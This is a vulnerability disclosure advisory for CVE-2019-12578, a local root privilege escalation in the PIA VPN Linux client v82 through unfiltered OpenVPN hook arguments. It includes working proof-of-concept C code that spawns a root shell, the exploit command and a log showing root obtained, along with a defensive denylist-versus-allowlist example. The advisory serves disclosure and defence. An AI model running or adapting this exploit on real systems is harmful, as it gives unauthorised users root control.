security-research/vulnerabilities/PIA/CVE-2019-12578.txt
Title: PIA Linux Privilege Escalation: Argument Injection
Author: Rich Mirch
CVE: CVE-2019-12578
Vendor Advisory: N/A
Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v82 for Linux could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.

The PIA Linux binary openvpn_launcher.64 is setuid root. This binary executes
/opt/pia/openvpn-64/openvpn, passing through the parameters provided on the
command line. Care was taken to programmatically blacklist potentially dangerous
openvpn parameters; however, --route-pre-down is not on the list. This parameter
accepts an arbitrary path to a script or program that OpenVPN runs, with root
privileges, before it removes its routes on exit. For OpenVPN to run such a hook
the --script-security parameter (level 2 or higher) must also be passed, and
--script-security is not currently in the blacklist either. A local unprivileged
user can therefore pass a malicious script or binary via --route-pre-down, and it
will be executed as root when openvpn is stopped.
Information on the --route-pre-down parameter from openvpn --help:

--route-pre-down cmd : Run command cmd before routes are removed.
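The filtering failure described above, as an added example that is not PIA's code: a hypothetical denylist-based argument filter of the kind the advisory describes, beside an allowlist filter, both run over the advisory's own proof-of-concept argument vector. The contents of both lists are assumptions made for illustration; the real list in openvpn_launcher.64 is not reproduced in this advisory. The allowlist deliberately leaves out --config as well, because a config file can carry any of the same hook options.

```c
/* Added example (not PIA's code). A setuid launcher that filters OpenVPN
 * arguments with a denylist passes through any hook option its author
 * forgot to list; an allowlist only passes options it knows are safe.
 * Both lists below are hypothetical, chosen to illustrate the pattern. */
#include <stdio.h>
#include <string.h>

/* Hypothetical denylist: script hooks the launcher author remembered.
 * --route-pre-down and --script-security are missing, as in the advisory. */
static const char *denied[] = {
    "--up", "--down", "--route-up", "--ipchange", "--plugin",
    "--tls-verify", "--auth-user-pass-verify", "--client-connect",
    "--client-disconnect", "--learn-address", "--config", NULL
};

/* Hypothetical allowlist: the only options an unprivileged caller may pass.
 * No script hook, no --script-security, no --config. */
static const char *allowed[] = {
    "--dev", "--remote", "--proto", "--port", "--cipher", "--auth", NULL
};

static int in_list(const char **list, const char *opt) {
    for (; *list; list++)
        if (strcmp(*list, opt) == 0) return 1;
    return 0;
}

/* Returns 1 if the denylist filter would hand opt to openvpn. */
int denylist_allows(const char *opt) {
    return !in_list(denied, opt);
}

/* Returns 1 only if opt is explicitly allowlisted. Tokens that do not
 * start with "--" are option values (e.g. "tun0") and are passed through. */
int allowlist_allows(const char *opt) {
    if (strncmp(opt, "--", 2) != 0) return 1;
    return in_list(allowed, opt);
}

/* Returns 1 if every argument in argv[1..argc-1] passes filter, otherwise
 * 0 at the first rejected argument, which is reported on stderr. */
int args_pass(int argc, char **argv, int (*filter)(const char *)) {
    for (int i = 1; i < argc; i++) {
        if (!filter(argv[i])) {
            fprintf(stderr, "rejected argument: %s\n", argv[i]);
            return 0;
        }
    }
    return 1;
}

int main(void) {
    /* Constructed argv mirroring the advisory's proof-of-concept command. */
    char *poc[] = { "openvpn_launcher.64", "--route-pre-down", "/home/user1/woot",
                    "--dev", "tun0", "--script-security", "2" };
    int n = (int)(sizeof poc / sizeof poc[0]);
    printf("denylist passes PoC:  %d\n", args_pass(n, poc, denylist_allows));
    printf("allowlist passes PoC: %d\n", args_pass(n, poc, allowlist_allows));
    return 0;
}
```

The denylist passes the full proof-of-concept vector untouched, which is exactly the v82 behaviour; the allowlist stops at --route-pre-down. When reviewing a setuid wrapper of this kind, the question to ask is not "which options are blocked" but "which options are permitted", and whether any permitted option (such as --config) can smuggle the blocked ones back in.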
CVSS

Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6
Test Environment

OS: Ubuntu 18.04.1 LTS
Kernel: 4.15.0-43-generic
PIA Version: v82

Note: macOS appears to follow the same pattern and could be vulnerable to the
same issue but I have not verified it.
Steps to reproduce

All steps are executed as a low privileged user.

Step 1 - Create woot.c to spawn a shell when executed.

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Run by openvpn (as root) via --route-pre-down: keep root and exec a shell. */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;
    setreuid(0, 0);                     /* make real and effective uid 0 so the shell keeps root */
    execl("/bin/sh", "/bin/sh", NULL);  /* replace this process with an interactive shell */
    return 1;                           /* only reached if execl fails */
}

Step 2 - Compile the malicious binary

gcc -Wall -o woot woot.c

Step 3 - Execute openvpn_launcher.64 with the --route-pre-down parameter set to
the path of the woot program. After 5 seconds a root shell will be spawned.

Note: Using the timeout program is optional. The command can be executed without
it, but you will then need to press control-c to kill the openvpn process.

/usr/bin/timeout --signal=SIGINT 5s /opt/pia/openvpn_launcher.64 \
    --route-pre-down $PWD/woot --dev tun0 --script-security 2

Step 4 - At this point the OpenVPN process will be running. Press control-c
if the timeout program was not used.
Example

user1@woot:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@woot:~$ cat woot.c
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argvc, char **arv){
    setreuid(0,0);
    execl("/bin/sh","/bin/sh",NULL);
}
user1@woot:~$ gcc -Wall -o woot woot.c
user1@woot:~$ /usr/bin/timeout --signal=SIGINT 5s /opt/pia/openvpn_launcher.64 \
    --route-pre-down $PWD/woot --dev tun0 --script-security 2
Wed Dec 26 16:54:56 2018 disabling NCP mode (--ncp-disable) because not in P2MP client or server mode
Wed Dec 26 16:54:56 2018 OpenVPN 2.4.6 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL] [MH/PKTINFO] [AEAD] built on Jul 26 2018
Wed Dec 26 16:54:56 2018 library versions: OpenSSL 1.1.0h 27 Mar 2018, LZO 2.06
Wed Dec 26 16:54:56 2018 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Wed Dec 26 16:54:56 2018 ******* WARNING *******: All encryption and authentication features disabled -- All data will be tunnelled as clear text and will not be protected against man-in-the-middle changes. PLEASE DO RECONSIDER THIS CONFIGURATION!
Wed Dec 26 16:54:57 2018 TUN/TAP device tun0 opened
Wed Dec 26 16:54:57 2018 Could not determine IPv4/IPv6 protocol. Using AF_INET
Wed Dec 26 16:54:57 2018 UDPv4 link local (bound): [AF_INET][undef]:1194
Wed Dec 26 16:54:57 2018 UDPv4 link remote: [AF_UNSPEC]
Wed Dec 26 16:55:01 2018 event_wait : Interrupted system call (code=4)
Wed Dec 26 16:55:01 2018 /home/user1/woot tun0 1500 1500 init
# id
uid=0(root) gid=1001(user1) groups=1001(user1)
#
Timeline:

2018-12-26: Reported to vendor
2018-12-26: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83; however, this version was never released.
            The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure